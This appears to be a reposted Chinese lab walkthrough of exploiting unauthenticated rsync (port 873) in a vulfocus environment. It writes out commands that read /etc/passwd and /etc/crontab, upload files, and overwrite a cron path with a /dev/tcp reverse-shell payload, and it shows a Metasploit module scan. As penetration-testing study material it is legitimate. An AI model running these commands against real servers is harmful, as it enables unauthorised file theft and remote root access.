首页 > 其他分享 >rsync未授权-873

rsync未授权-873

时间:2024-10-16 12:46:07浏览次数:1  
标签:rsync 60522 40.130 873 192.168 cron etc 授权

环境搭建

https://www.freebuf.com/articles/web/278245.html

rsync: /vulhub/rsync/common/ -https://blog.csdn.net/weixin_45006525/article/details/123873166

vulfocus

docker pull vulfocus/vulfocus:latest
docker run -d -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock  -e VUL_IP=192.168.40.130 vulfocus/vulfocus

image-20240310120902374

rsync-873 √

基础了解

rsync是Linux系统下的数据镜像备份工具,使用rsync可以快速增量备份数据,支持本地复制,或与其他SSH、rsync主机同步。

漏洞利用

测试漏洞存在:

rsync rsync://192.168.40.130:60522

image-20240310121012614

查看文件:

rsync rsync://192.168.40.130:60522/src/etc/passwd

image-20240310121109860

下载文件:

rsync rsync://192.168.40.130:60522/src/etc/passwd ./passwd

image-20240310121150414

上传文件:

rsync ceshi.txt rsync://192.168.40.130:60522/src/ceshi.txt

image-20240310121458616

计划任务反弹shell:

# 读取计划任务
rsync rsync://192.168.40.130:60522/src/etc/crontab /tmp/cron.txt

# 查看计划任务
cat /tmp/cron.txt

image-20240310121904209

计划任务中有这么一行:17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
含义:每小时的第17分钟,以root用户的身份执行/etc/cron.hourly文件

所以接下来就是将反弹shell的文件替代/etc/cron.hourly

# 创建文件 shell
/bin/bash -i >& /dev/tcp/192.168.40.130/2333 0>&1
# 上传并覆盖/etc/hourly
rsync -av shell rsync://192.168.40.130:60522/src/etc/hourly

image-20240310122605762

开始监听并等待17分钟接收shell即可

msf利用

探测:

image-20240310124837487

use scanner/rsync/modules_list
set rhosts 192.168.40.130
set rport 39367
show options
run

image-20240310124933315

批量:

set rhosts file:/tmp/list

image-20240310150155211

标签:rsync,60522,40.130,873,192.168,cron,etc,授权
From: https://www.cnblogs.com/starme/p/18469640

相关文章

  • Redis未授权-6379
    原理分析Redis默认情况下,会绑定在0.0.0.0:6379,这样将会将Redis服务暴露到公网上如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下可以利用Redis的相关方法,可以成功在......
  • redis未授权访问及利用总结
    Redis未授权访问漏洞漏洞原理redis默认端口6379,在默认配置情况下密码为空,因此如果将redis暴露到公网,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据,并且可以利用redis写入shell、写入公钥等危险操作漏洞复现安装redis下载安装包后进行解......
  • FairSync extends Sync 线程抢锁分析6
    直接代码中分析staticfinalclassFairSyncextendsSync{privatestaticfinallongserialVersionUID=-3000897897090466540L;//争锁finalvoidlock(){acquire(1);}//来自父类AQS,我直接贴过来这边,下面分析的时候同样会这样......
  • FairSync extends Sync 线程抢锁分析4
    直接代码中分析staticfinalclassFairSyncextendsSync{privatestaticfinallongserialVersionUID=-3000897897090466540L;//争锁finalvoidlock(){acquire(1);}//来自父类AQS,我直接贴过来这边,下面分析的时候同样会这样......
  • 18732 最短路问题
    ###思路1.**建模问题**:将车站和公交线路建模为图,其中车站是节点,公交线路是带权边。2.**选择算法**:使用Dijkstra算法求解从车站1到车站n的最短路径问题。3.**初始化**:创建一个优先队列(最小堆)来存储当前节点和到达该节点的最小花费。初始化所有节点的最小花费为无穷大,起......
  • 第105天:权限提升-Linux系统&Docker挂载&Rsync未授权&Sudo-CVE&Polkit-CVE
    演示案例Linux-Rsync未授权访问覆盖-本地Linux-Docker组用户挂载目录-本地Linux-Sudo(CVE-2021-3156)-本地Linux-Polkit(CVE-2021-4034)-本地Rsync(未授权访问)Rsync是linux下一款数据备份工具,默认开启873端口https://vulhub.org/#/environments/rsync/common/借助Linux默认......
  • 微信小程序登录授权获取基础信息
            最近在写小程序项目时遇到一些问题,小程序登录授权API接口调用会区分新旧版本库,旧版本在调取wx.getUserProfile接口时会直接从底部弹窗,从而允许或取消授权;而新版本库则需要自行设置弹窗,提醒用户授权使用。    测试新版本和旧版本究竟是哪个可以自动底......
  • 备份服务rsync
    1.备份服务目标1.备份服务应用场景2.两台机器之间传输数据的命令:scp,rsync3.备份服务使用流程.服务端,客户端.4.服务使用流程中的排错(总结至少5个故障与排查流程).5.备份项目:所有服务器数据备份,在备份服务器检查,邮件发送结果.2.备份服务概述2.1目标目标:主要解决数......
  • Adobe Acrobat Pro 中文授权版
    AdobeAcrobatPro是Adobe出品的一款PDF转换软件,可以用于创建和编辑包含多媒体的PDF文件、更安全地共享信息以及更高效地收集反馈。该版本已授权,可以使用全部功能。使用说明:1、将压缩文件解压到固定位置,不要随意移动。2、解压后,双击start_Acrobat.bat来运行软件下载......
  • 如何保护网站免受未经授权的机器人访问
    在数字化时代,机器人流量已成为网站管理员和安全团队面临的重大挑战。机器人流量,即由自动化软件而非人类产生的网络流量,可能对网站的数据分析、安全性和整体性能产生重大影响。为了有效应对这一问题,本文将探讨一系列先进的策略,以检测和防止未经授权的机器人访问。1.使用验证码验证......